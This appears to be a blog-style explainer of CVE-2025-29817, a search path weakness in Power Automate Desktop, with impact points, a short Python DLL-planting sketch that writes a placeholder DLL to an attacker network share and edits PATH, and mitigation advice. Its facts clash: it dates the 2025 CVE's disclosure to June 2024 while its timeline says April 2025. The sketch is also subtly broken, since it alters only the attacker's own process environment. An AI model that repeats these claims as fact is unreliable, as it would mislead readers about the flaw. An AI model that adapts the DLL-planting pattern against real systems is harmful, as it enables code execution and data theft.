CVE-2025-29817 - Uncontrolled Search Path Element in Power Automate Exposes Sensitive Data

On June 7, 2024, Microsoft disclosed a security bug tracked as CVE-2025-29817, relating to “Uncontrolled Search Path Element” in the Power Automate desktop application. This vulnerability allows an attacker with authorized access to leak sensitive information across a network, posing a real threat to business workflows.

Below, we break down what this vulnerability is, show you how it can be exploited, and what you can do to stay secure.

What is CVE-2025-29817?

This CVE refers to a weakness in how Power Automate handles paths to system resources. Basically, when Power Automate runs a process, it may search for libraries or tools using a path that can be controlled (directly or indirectly) by an attacker.

When a program relies on directories or paths set in environment variables (like PATH), and these can be overwritten or influenced by an attacker, it becomes possible to load malicious files instead of the expected system ones. This is what's meant by “Uncontrolled Search Path Element.”

Why is this a Big Deal?

- Information Exposure: An attacker can plant files in a known location, and if Power Automate looks in the wrong place first, it may load those fake files. This can leak credentials, environment data, or even let an attacker execute further code.
- Network Attack Vector: The attack works over a network if an attacker can influence a network share or mapped path.
- Minimal Privileges Required: The attacker only needs the same level of access as someone running Power Automate.

How It Might Be Exploited

Suppose you have a legitimate Power Automate flow that loads a DLL (Dynamic Link Library). Power Automate might search in the current directory or other paths defined by the PATH environment variable before searching secure system folders.

If an attacker can create a fake DLL with the same name in one of these paths, the application may load the malicious DLL. Here’s a simplified exploitation example:

import os
import shutil

# Attacker prepares a malicious DLL
malicious_dll = b'MZ...'  # Binary payload of malicious DLL

# The attacker copies malicious DLL to a network share accessible by victim
network_share = r'\\attacker-pc\shared'
dll_name = 'vulnerable.dll'

with open(os.path.join(network_share, dll_name), 'wb') as f:
    f.write(malicious_dll)

# The attacker tricks Power Automate into referencing this share somewhere in PATH
os.environ['PATH'] = network_share + ';' + os.environ['PATH']

# Now, when Power Automate launches or loads a component, it checks the attacker's DLL first

Result: Sensitive data (e.g., credentials, process information) could be intercepted and sent to the attacker's server.

Prevention and Mitigation

Microsoft has addressed this bug in new releases of Power Automate Desktop. Update your software as soon as possible. Additionally:

Set strict permissions on directories in your search path.

More technical advice can be found in Microsoft’s advisory.

References

- Microsoft Security Response Center Advisory for CVE-2025-29817
- MITRE’s CVE Record for CVE-2025-29817
- OWASP: Uncontrolled Search Path Element

Conclusion

CVE-2025-29817 is a serious reminder to always validate your software configurations and trust boundaries. If you or your business uses Power Automate Desktop, don’t wait—patch right away and review your environment paths regularly!

If you want more details or help on remediation, drop your questions below or head to the official Microsoft update guide. Stay safe!

Timeline

Published on: 04/15/2025 17:15:48 UTC
Last modified on: 04/16/2025 00:41:34 UTC